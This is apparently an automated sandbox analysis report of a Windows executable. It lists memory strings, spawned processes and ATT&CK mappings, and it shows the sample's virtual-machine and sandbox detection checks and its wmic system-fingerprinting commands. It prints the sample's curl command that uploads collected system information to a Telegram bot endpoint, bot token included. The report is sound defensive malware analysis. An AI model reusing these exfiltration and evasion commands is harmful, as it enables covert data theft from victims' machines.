Source: tasklist.exe, 00000022.00000002.1785611901.000001F9D2F90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
Source: 9KEZfGRjyK.exeBinary or memory string: api_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystem
Source: tasklist.exe, 00000026.00000002.1789681464.000001D7126FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: sandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxservice.exe/
Source: tasklist.exe, 00000022.00000003.1785347832.000001F9D2FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: BrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: abbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: AdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1734307321.000001DBD424A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734238940.000001DBD4248000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD424B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport65
Source: tasklist.exe, 00000024.00000002.1787932928.000002173DBC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: system_info.txt.0.drBinary or memory string: - vmtoolsd.exe
Source: 9KEZfGRjyK.exeBinary or memory string: Georgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: georgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD4221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWP
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: AlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787694674.000002173DA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: tasklist.exe, 00000026.00000002.1789528173.000001D712665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'PRO1t~eU@
Source: tasklist.exe, 00000024.00000003.1787316251.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD424A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734238940.000001DBD4248000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD424B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: tasklist.exe, 00000024.00000002.1787694674.000002173DA50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vboxservice.exe"C:\Windows\system32\tasklist.exeWinsta0\Default
Source: tasklist.exe, 00000022.00000002.1785776288.000001F9D3255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'PRO
Source: 9KEZfGRjyK.exeBinary or memory string: VMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126ED000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789092020.000001D7126E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789241974.000001D7126ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: vboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vmtoolsd.exe
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: 9KEZfGRjyK.exeBinary or memory string: wpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: curl.exe, 0000002D.00000003.2422964793.00000265942F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 9KEZfGRjyK.exeBinary or memory string: fredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787932928.000002173DBC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxservice.exel\Te
Source: 9KEZfGRjyK.exeBinary or memory string: vboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: harry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vmtoolsd.exee9
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: brunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1789528173.000001D712660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxtray.exea\Local\Te
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: vtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: FredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785776288.000001F9D3250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vmtoolsd.exea\Local\Te
Source: getmac.exe, 0000000D.00000003.1734307321.000001DBD424A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734238940.000001DBD4248000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD424B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'U
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: 9KEZfGRjyK.exeBinary or memory string: HYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe^P
Source: tasklist.exe, 00000022.00000002.1785692557.000001F9D2FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: 9KEZfGRjyK.exeBinary or memory string: rootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: QEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000003.1789165083.000001D7126FA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000002.1789681464.000001D7126FC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789092020.000001D7126E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxtray.exe
Source: 9KEZfGRjyK.exeBinary or memory string: vmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000003.1789165083.000001D7126FA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789092020.000001D7126E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE');
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4139174 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F4139174
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F412AA60 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF7F412AA60
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411E030 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF7F411E030
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4139174 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F4139174
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F4139318 SetUnhandledExceptionFilter,0_2_00007FF7F4139318
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F413C07C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7F413C07C
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get nameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemoryJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,sizeJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayNameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\getmac.exe "getmac"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get modelJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentJump to behavior
Source: C:\Windows\System32\curl.exeQueries volume information: C:\Users\user\Desktop\system_info.txt VolumeInformation
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411FDF0 ProcessPrng,GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,ProcessPrng,0_2_00007FF7F411FDF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F413904C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7F413904C
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F410DA70 GetTimeZoneInformationForYear,0_2_00007FF7F410DA70
Source: C:\Windows\System32\curl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
MITRE ATT&CK matrix (number before a technique is the count of matched signatures):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 341 Windows Management Instrumentation | 1 DLL Side-Loading | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 461 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Process Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 135 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1578571 | Sample: 9KEZfGRjyK.exe | Startdate: 19/12/2024 | Architecture: WINDOWS | Score: 68

Start
  Signatures: Machine Learning detection for sample; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  DNS/IP: api.telegram.org (signature: Uses the Telegram API (likely for C&C communication))
  Process started: 9KEZfGRjyK.exe
    Signatures: Contain functionality to detect virtual machines; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Process started: getmac.exe
      Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
      Process started: conhost.exe
    Process started: WMIC.exe
      Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
      Process started: conhost.exe
    Process started: systeminfo.exe
      Process started: conhost.exe
    18 other processes
      DNS/IP: api.telegram.org 149.154.167.220, 443, 49770 TELEGRAMRU United Kingdom; 127.0.0.1 unknown unknown
      Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Process started: conhost.exe (x3); 15 other processes
Source | Detection | Scanner | Label | Link
9KEZfGRjyK.exe | 5% | ReversingLabs | |
9KEZfGRjyK.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument& | curl.exe, 0000002D.00000002.2423334465.00000265942FF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422919071.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422937156.00000265942FE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o | 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentC: | curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentc | curl.exe, 0000002D.00000002.2423255293.00000265942E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o.txt9 | 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentapi.telegram. | curl.exe, 0000002D.00000002.2423296304.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422964793.00000265942FD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422919071.00000265942FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.rs/getrandom#nodejs-es-module-support | 9KEZfGRjyK.exe | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false

Private IPs:
127.0.0.1
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1578571
                    Start date and time:2024-12-19 22:51:13 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:49
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:9KEZfGRjyK.exe
                    renamed because original name is a hash value
                    Original Sample Name:73b0e64dcc0df2f2ac4d461245021e6a.exe
                    Detection:MAL
                    Classification:mal68.troj.evad.winEXE@64/2@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 17
                    • Number of non-executed functions: 54
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
